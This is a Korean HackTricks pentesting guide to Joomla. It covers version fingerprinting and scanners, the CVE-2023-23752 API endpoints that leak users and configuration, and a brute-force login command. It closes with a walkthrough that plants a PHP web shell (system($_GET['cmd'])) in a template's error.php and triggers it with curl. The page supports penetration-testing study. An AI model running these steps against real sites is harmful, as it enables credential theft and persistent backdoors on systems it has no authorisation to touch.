hacktricks/network-services-pentesting/pentesting-web/joomla.md

5.9 KiB

Joomla

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Joomla 통계

Joomla는 Joomla 설치에서 사용 중인 Joomla, PHP 및 데이터베이스 버전과 서버 운영 체제의 분류와 같은 익명의 사용 통계를 수집합니다. 이 데이터는 그들의 공개 API를 통해 쿼리할 수 있습니다.

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}

Enumeration

Discovery/Footprinting

  • 메타 확인
curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />
  • robots.txt
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
  • README.txt
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging

Version

  • /administrator/manifests/files/joomla.xml에서 버전을 확인할 수 있습니다.
  • /language/en-GB/en-GB.xml에서 Joomla의 버전을 확인할 수 있습니다.
  • plugins/system/cache/cache.xml에서 대략적인 버전을 확인할 수 있습니다.

Automatic

droopescan scan joomla --url http://joomla-site.local/

In 80,443 - Pentesting Web Methodology는 CMS 스캐너에 대한 섹션입니다 Joomla를 스캔할 수 있습니다.

API 인증되지 않은 정보 유출:

버전 4.0.0에서 4.2.7까지는 인증되지 않은 정보 유출(CVE-2023-23752)에 취약하여 자격 증명 및 기타 정보를 덤프합니다.

  • 사용자: http://<host>/api/v1/users?public=true

  • 구성 파일: http://<host>/api/index.php/v1/config/application?public=true

MSF 모듈: scanner/http/joomla_api_improper_access_checks 또는 루비 스크립트: 51334

무차별 대입

스크립트를 사용하여 로그인에 대한 무차별 대입을 시도할 수 있습니다.

sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

admin:admin

RCE

관리자 자격 증명을 얻었다면 RCE를 수행할 수 있습니다. 이를 위해 PHP 코드 조각을 추가하여 RCE를 얻을 수 있습니다. 우리는 템플릿을 사용자 정의하여 이를 수행할 수 있습니다.

  1. Configuration 아래의 왼쪽 하단에서 **Templates**를 클릭하여 템플릿 메뉴를 불러옵니다.
  2. 템플릿 이름을 클릭합니다. Template 열 헤더 아래의 **protostar**를 선택합시다. 그러면 Templates: Customise 페이지로 이동합니다.
  3. 마지막으로, 페이지를 클릭하여 페이지 소스를 불러올 수 있습니다. error.php 페이지를 선택합시다. 다음과 같이 코드 실행을 위한 PHP 원라이너를 추가할 것입니다:
  4. system($_GET['cmd']);
  5. 저장 및 닫기
  6. curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}